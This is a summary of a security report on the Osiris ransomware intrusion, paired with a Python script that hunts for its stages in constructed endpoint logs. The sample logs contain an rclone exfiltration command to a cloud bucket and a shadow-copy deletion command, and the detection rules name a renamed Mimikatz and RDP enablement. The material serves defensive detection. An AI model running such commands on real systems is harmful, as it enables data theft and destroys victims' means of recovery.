RESEARCHERS identified a new ransomware family, Osiris, used in a November 2025 attack against a major Southeast Asian food service franchise operator, in which the operators deployed a malicious POORTRY driver via BYOVD (bring your own vulnerable driver) to disable security tools.
According to Symantec and VMware Carbon Black threat hunters, Osiris is a full-featured ransomware capable of stopping services, encrypting selected files, and dropping a ransom note; it appends a .Osiris extension to encrypted files and deletes VSS snapshots to hinder recovery.
The attack chain began days before the ransomware deployment, with data quietly stolen using Rclone and uploaded to a Wasabi cloud storage bucket. Tooling such as a Mimikatz variant named kaz[.]exe was reused from past INC ransomware operations, suggesting either imitation or a former INC affiliate. Dual-use tools, including Netscan, Netexec, MeshAgent, and a modified RustDesk RMM tool masquerading as “WinZip Remote Desktop”, were employed to blend in with legitimate activity, and KillAV was used alongside BYOVD to shut down security software.
The operation also involved enabling RDP for remote access before the ransomware run, and researchers note possible links to the INC ransomware group and Medusa activity, though attribution remains unclear.
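The attack chain above maps to a handful of host-level signals a defender can hunt for: an Rclone transfer to a cloud remote, a renamed credential-dumping binary, RDP being switched on through the registry, a driver loading from a writable staging directory, VSS snapshot deletion, and a burst of renames to the .Osiris extension. The following is an added example, not code from the Symantec/Carbon Black report, that runs simple detection rules over constructed endpoint telemetry. The event format, field names, hostnames, file paths, the Wasabi remote name and the driver filename are all assumptions made for the example; the only report-derived values are the tool name kaz.exe (written here without the defanging brackets) and the .Osiris extension.

```python
import re
from collections import Counter

# Constructed sample telemetry (not from the report): one event per line,
# "<utc-timestamp> <host> <event-type> key=value ..."; values with spaces are quoted.
SAMPLE_EVENTS = """\
2025-11-10T02:14:03Z srv-fin01 ProcessCreate image=C:\\tools\\rclone.exe cmdline="rclone.exe copy D:\\Finance wasabi:exfil-bucket --transfers 8"
2025-11-10T02:20:11Z srv-fin01 ProcessCreate image=C:\\Users\\Public\\kaz.exe cmdline="kaz.exe"
2025-11-12T22:01:45Z dc01 RegistryValueSet key="HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" value=fDenyTSConnections data=0
2025-11-12T22:05:09Z dc01 DriverLoad image=C:\\Windows\\Temp\\drv.sys signed=true
2025-11-13T01:30:00Z srv-fin01 ProcessCreate image=C:\\Windows\\System32\\vssadmin.exe cmdline="vssadmin.exe delete shadows /all /quiet"
2025-11-13T01:31:02Z srv-fin01 FileRename path=D:\\Finance\\q3.xlsx.Osiris
2025-11-13T01:31:03Z srv-fin01 FileRename path=D:\\Finance\\q4.xlsx.Osiris
2025-11-13T01:31:03Z srv-fin01 FileRename path=D:\\Finance\\budget.docx.Osiris
2025-11-13T09:00:00Z ws-042 ProcessCreate image="C:\\Program Files\\WinZip\\winzip64.exe" cmdline="winzip64.exe"
"""

EVENT_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<type>\S+) ?(?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# An rclone remote looks like "name:path"; a single drive letter ("D:\...") is not a remote.
REMOTE_RE = re.compile(r"(?<!\S)[A-Za-z][\w-]+:")


def parse_event(line):
    """Parse one telemetry line into a dict; return None for lines that do not match."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    fields = {k: (quoted or bare) for k, quoted, bare in KV_RE.findall(m.group("rest"))}
    return {"ts": m.group("ts"), "host": m.group("host"), "type": m.group("type"), **fields}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_vss_deletion(ev):
    """Shadow copy deletion via vssadmin/wmic, the recovery-hindering step described in the report."""
    cmd = ev.get("cmdline", "").lower()
    return (ev["type"] == "ProcessCreate"
            and basename(ev.get("image", "")) in {"vssadmin.exe", "wmic.exe"}
            and "delete" in cmd and "shadow" in cmd)


def is_rclone_cloud_transfer(ev):
    """Rclone copying/syncing data to a configured cloud remote (exfiltration pattern)."""
    if ev["type"] != "ProcessCreate" or basename(ev.get("image", "")) != "rclone.exe":
        return False
    cmd = ev.get("cmdline", "")
    return any(verb in cmd.split() for verb in ("copy", "sync", "move")) and REMOTE_RE.search(cmd) is not None


def is_rdp_enabled(ev):
    """fDenyTSConnections set to 0 turns Remote Desktop on."""
    return (ev["type"] == "RegistryValueSet"
            and ev.get("value") == "fDenyTSConnections" and ev.get("data") == "0")


def is_driver_from_staging_dir(ev):
    # BYOVD drivers carry a valid signature, so "signed" is not a useful filter on its own;
    # a kernel driver loading from a user-writable directory is the heuristic used here.
    img = ev.get("image", "").lower()
    return ev["type"] == "DriverLoad" and any(
        d in img for d in ("\\windows\\temp\\", "\\users\\public\\", "\\programdata\\"))


KNOWN_TOOL_NAMES = {"kaz.exe"}  # renamed Mimikatz named in the report; filename matching is weak, prefer hashes


def is_known_tool(ev):
    return ev["type"] == "ProcessCreate" and basename(ev.get("image", "")) in KNOWN_TOOL_NAMES


RULES = [
    ("vss_snapshot_deletion", is_vss_deletion),
    ("rclone_cloud_transfer", is_rclone_cloud_transfer),
    ("rdp_enabled_via_registry", is_rdp_enabled),
    ("driver_load_from_staging_dir", is_driver_from_staging_dir),
    ("known_tool_name", is_known_tool),
]


def encryption_bursts(events, extension=".osiris", threshold=3):
    """Hosts where at least `threshold` files were renamed to the ransomware extension."""
    counts = Counter(ev["host"] for ev in events
                     if ev["type"] == "FileRename" and ev.get("path", "").lower().endswith(extension))
    return {host: n for host, n in counts.items() if n >= threshold}


def run_detections(text):
    """Apply every rule to every event; return alerts plus hosts showing an encryption burst."""
    events = [ev for ev in (parse_event(line) for line in text.splitlines()) if ev]
    alerts = [(name, ev["host"], ev["ts"]) for ev in events for name, rule in RULES if rule(ev)]
    return {"alerts": alerts, "encryption_hosts": encryption_bursts(events)}


if __name__ == "__main__":
    result = run_detections(SAMPLE_EVENTS)
    for name, host, ts in result["alerts"]:
        print(f"{ts} {host}: {name}")
    print("encryption bursts:", result["encryption_hosts"])
```

The rules are deliberately ordered as the chain unfolded: the Rclone and kaz.exe hits land days before the RDP change, driver load and VSS deletion, so correlating alerts per host over time (rather than reacting to any single rule) is what turns the early exfiltration stage into a usable warning before the encryption burst.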